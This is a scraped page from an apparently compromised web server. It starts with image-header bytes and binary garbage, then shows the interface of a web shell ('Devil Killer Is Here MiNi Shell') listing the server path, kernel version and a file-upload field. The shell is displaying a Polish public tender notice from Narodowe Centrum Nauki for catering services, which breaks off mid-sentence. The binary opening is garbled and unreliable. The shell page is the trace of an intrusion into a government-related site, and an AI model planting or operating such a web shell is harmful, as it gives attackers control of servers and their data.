JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220224/0006763401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług cateringowych podczas spotkań organizowanych przez Narodowe Centrum Nauki w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Narodowe Centrum Nauki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 121361537</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Twardowskiego 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-312</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 12 3419001</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@ncn.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ncn.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wspieranie działalności naukowej w zakresie badań podstawowych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług cateringowych podczas spotkań organizowanych przez Narodowe Centrum Nauki w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1d3025d0-931a-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00067634</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00058830/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług cateringowych podczas spotkań organizowanych przez Narodowe Centrum Nauki w Krakowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.sidaspzp.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający korzysta w niniejszym postępowaniu z Platformy SIDAS, która umożliwia Wykonawcy złożenie oferty w postępowaniu, a także komunikację z Zamawiającym. Dostęp do platformy jest dla Wykonawcy bezpłatny. Podgląd i pobieranie dokumentacji postępowania nie wymaga logowania. W celu komunikacji z Zamawiającym i złożenia oferty w postępowaniu należy założyć konto na stronie: https://app.sidaspzp.pl/rejestracja/wykonawca<br/>Szczegółowe informacje o sposobie porozumiewania się Zamawiającego z Wykonawcami zwarte są w Rozdziale 11 SWZ.<br/>Wnioski o wyjaśnienie treści SWZ można przekazywać za pośrednictwem Platformy SIDAS lub na adres: zamowienia.publiczne@ncn.gov.pl. Składanie ofert odbywa się wyłącznie za pośrednictwem Platformy SIDAS w sposób opisany w Rozdziale 13 ust. 2 SWZ.<br/>Adres elektroniczny Platformy: https://zamowienia.sidaspzp.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie SIDAS:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć ram min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych: Linux Kernel 4.0, Windows 7 i MacOS 10.12 – lub ich nowsze wersje,<br/>c) zainstalowana przeglądarka internetowa w najnowszych wersjach, np.: Firefox, Chrome, Opera,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program do obsługi formatów .pdf np. Acrobat Reader,<br/>f) dopuszczalne formaty przesłanych danych tj. plików o wielkości do 100 MB to: png, jpg, jpeg, gif, doc, docx, xls, xlsx, ppt, pptx, odt, ods, odp, odf, pdf, zip, rar, 7zip, txt, ath, xml, dwg, xades, tar, 7z, eml, msg,<br/>g) czas serwera jest synchronizowany z czasem udostępnionym przez Główny Urząd Miar.<br/>2. Wykonawca składa ofertę w postępowaniu wyłącznie za pośrednictwem Platformy SIDAS, która zapewnia zachowanie integralności, autentyczności, nienaruszalności danych i ich poufności w ramach wymiany i przechowywania informacji, w tym zapewniających możliwość zapoznania się z ich treścią wyłącznie po upływie terminu na ich składanie;<br/>3. Wykonawca, który zamierza złożyć ofertę w postępowaniu o udzielenie zamówienia publicznego,<br/>musi założyć konto Wykonawcy na Platformie SIDAS. Rejestracji konta Wykonawcy można dokonać na stronie: https://app.sidaspzp.pl/rejestracja/wykonawca<br/>Instrukcja zakładania konta na Platformie SIDAS oraz składania oferty i zasad komunikacji znajduje się w „Instrukcji użytkownika systemu PZP 1.3 – Wykonawca” dostępnej pod adresem:<br/>https://sidaspzp.pl/wp-content/uploads/2020/07/Madkom_PZP_wykonawca_1.3.pdf<br/>4. Oferta pod rygorem nieważności musi być sporządzona w formie elektronicznej (z kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym w ogólnie dostępnych formatach danych, w szczególności w formatach: .pdf, doc, .docx;<br/>5. Oferta wraz z załącznikami musi być sporządzona w języku polskim. Każdy dokument składający się na ofertę lub złożony wraz z ofertą sporządzony w języku innym niż polski musi być złożony wraz z tłumaczeniem na język polski;<br/>6. Oferta musi być opatrzona podpisem kwalifikowanym lub podpisem zaufanym lub podpisem<br/>osobistym przez Wykonawcę, tj. osobę (osoby) działającą w imieniu Wykonawcy, zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze albo osobę (osoby) upoważnioną do reprezentowania Wykonawcy na podstawie pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy<br/>7. Tajemnica przedsiębiorstwa - w przypadku gdy dokumenty elektroniczne w postępowaniu<br/>przekazywane przez Wykonawcę przy użyciu środków komunikacji elektronicznej zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, Wykonawca w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku (odpowiednia nazwa pliku).<br/>8. Podmiotowe środki dowodowe, oświadczenia, zobowiązanie podmiotu udostępniającego zasoby, dokumenty, pełnomocnictwo określone w Rozdziale 10 SWZ sporządza się w postaci elektronicznej w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17.02.2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, z uwzględnieniem rodzajów przekazywanych danych oraz przekazuje w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>9. Informacje, oświadczenia lub dokumenty, inne niż określone w Rozdziale 10 SWZ (nie dotyczy oferty), sporządza się w postaci elektronicznej w formatach danych określonych w przepisach o których mowa w pkt 8, lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający zrealizował obowiązek informacyjny w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający zrealizował obowiązek informacyjny w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DSO.271.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług cateringowych podczas spotkań<br/>organizowanych w Krakowie przez Narodowe Centrum Nauki w Krakowie.<br/>2. Szczegółowy opis przedmiotu zamówienia (SOPZ) zawarty jest w Załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo rozszerzenia świadczenia usług cateringowych o tzw. OPCJĘ w wymiarze: 606 zestawów kawowych, 366 zestawów lunchowych 1 daniowych, 240 zestawów lunchowych 3 daniowych. O zamiarze skorzystania z OPCJI Zamawiający poinformuje Wykonawcę drogą mailową w terminie nie krótszym niż 14 dni kalendarzowych. W zgłoszeniu zostanie określony termin realizacji oraz wstępna liczba oraz rodzaj zestawu. Zamawiający skorzysta z opcji, w przypadku, gdy okoliczności związane z panującą epidemią wirusa SARS-CoV-2 umożliwią organizację spotkań w trybie stacjonarnym <br/>z udziałem gości z zagranicy w III i IV kwartale 2022 roku. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze najkorzystniejszą ofertę, spośród ofert<br/>złożonych w postępowaniu, które nie zostały odrzucone, na podstawie kryteriów oceny ofert<br/>określonych w Rozdziale 19 SWZ. Za najkorzystniejszą zostanie uznana oferta, która uzyska<br/>największą łączną liczbę punktów.<br/>2. Kryteria oceny ofert i ich znaczenie:<br/>K1 Cena oferty brutto (waga 60 %); K2 Sposób prezentacji potraw<br/>(waga 25 %); K3 Portfolio (waga 10 %); K4 Warunki zmniejszenia liczby uczestników spotkania (waga 5 %).<br/>3. Sposób przyznawania punktów został opisany w Rozdziale 19 SWZ.<br/>4. Zamawiający dokona oceny ofert, przyznając punkty w ramach kryteriów, przyjmując zasadę, że 1% = 1 punkt<br/>5. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybierze ofertę z najniższą ceną.<br/>6. Jeżeli nie będzie można dokonać wyboru oferty w sposób, o którym mowa w pkt 5, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Sposób prezentacji potraw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Portfolio</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki zmniejszenia liczby uczestników spotkania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W celu oceny zdolności Wykonawcy do należytego wykonania zamówienia Zamawiający<br/>wymaga od Wykonawcy wykazania spełnienia następujących warunków udziału w<br/>postępowaniu:<br/>1) w zakresie zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>2) w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o<br/>ile wynika to z odrębnych przepisów:<br/>W postępowaniu może wziąć udział Wykonawca, który wykaże, że:<br/>a) zakład, w którym będą przygotowywane posiłki, wpisany jest do rejestru zakładów<br/>podlegających urzędowej kontroli przez organ Państwowej Inspekcji Sanitarnej,<br/>b) zakład, w którym będą przygotowywane posiłki, posiada ważną decyzję właściwego<br/>Państwowego Powiatowego Inspektora Sanitarnego zatwierdzającą zakład jako spełniający<br/>wymagania do prowadzenia działalności gastronomicznej. Podstawa prawna art. 4, art. 61 i art.<br/>62 ust. 1 pkt. 2 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t.j. Dz.<br/>U. z 2018 r. poz. 1541 z późn. zm.), art. 31 ust. 2 lit. c rozporządzenia (WE) nr 882/2004<br/>Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie kontroli urzędowych przeprowadzanych w celu sprawdzenia zgodności z prawem paszowym i żywnościowym oraz<br/>regułami dotyczącymi zdrowia zwierząt i dobrostanu zwierząt (Dz. Urz. UE, L 165 z 30.04.2004<br/>r.) art. 4 rozporządzenia (WE) Parlamentu Europejskiego i Rady nr 852/2004 z dnia 29 kwietnia<br/>2004 r. w sprawie higieny środków spożywczych (Dz. Urz. UE L 139 z 30.04.2004 r.),<br/>c) środek transportu przeznaczony do przewozu posiłków został dopuszczony do użytkowania<br/>przez Państwowego Powiatowego Inspektora Sanitarnego.<br/>3) w zakresie sytuacji finansowej i ekonomicznej:<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>4) w zakresie zdolności technicznej lub zawodowej:<br/>Zamawiający określa następujące, minimalne warunki w zakresie zdolności technicznej i<br/>zawodowej:<br/>a) W celu wykazania spełnienia powyższego warunku Wykonawcy muszą wykazać, że w<br/>okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, należycie wykonał a w przypadku świadczeń<br/>powtarzających się lub ciągłych również należycie wykonuje co najmniej 3 usługi cateringowe o<br/>wartości każdej z nich powyżej 30.000 zł brutto. Zamawiający uzna warunek za spełniony także jeżeli usługa cateringowa realizowana była w dłuższym okresie czasu i składała się z usług cateringowych częściowych, a łączna wartość umowy przekroczyła wartość wskazaną w zdaniu poprzednim. W przypadku świadczeń powtarzających się lub ciągłych, które Wykonawca nadal wykonuje, wymagane jest, aby już zrealizowany zakres usługi (zamówienia) spełniał wymogi opisanego wyżej warunku.<br/>Jednocześnie każda z wymaganych powyżej 3 usług:<br/>• musi obejmować swoim zakresem przygotowanie i obsługę przerwy kawowej oraz przerwy<br/>obiadowej (z wydawaniem posiłków gorących);<br/>• wymagane jest, by miejscem wykonywania tych usług były spotkania w czasie konferencji,<br/>kongresów, szkoleń, spotkań firmowych lub spotkań biznesowych.<br/>Zamawiający nie uzna za spełnienie warunku wykazanie się doświadczeniem w zakresie obsługi takich jednostek jak: szpitale, szkoły, przedszkola, żłobki, bufety i inne, gdzie posiłki są<br/>organizowane jako wyżywienie całodzienne, stałe, ciągłe i powtarzające się.<br/>2. Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie<br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia.<br/>3. Ocena spełnienia warunków udziału w postępowaniu oraz braku podstaw do wykluczenia<br/>Wykonawcy będzie dokonana w oparciu o złożone przez Wykonawcę oświadczenia i dokumenty<br/>(z zastrzeżeniem art. 128 ustawy Pzp).<br/>4. Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie<br/>postępowania o udzielenie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Składane na wezwanie Zamawiającego przez wykonawcę, którego oferta została najwyżej<br/>oceniona:<br/>1) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Wykonawca nie jest zobowiązany do złożenia ww podmiotowego środka dowodowego jeżeli<br/>Zamawiający może go uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w<br/>szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2020 r., poz. 346 ze zm.), o ile Wykonawca wskazał w Formularzu oferty, stanowiącym załącznik nr 2 do SWZ dane umożliwiające<br/>dostęp do tych środków.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>2. Podmioty zagraniczne:<br/>1) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w ust. 1 pkt 2, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury;<br/>2) jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt.1, zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, 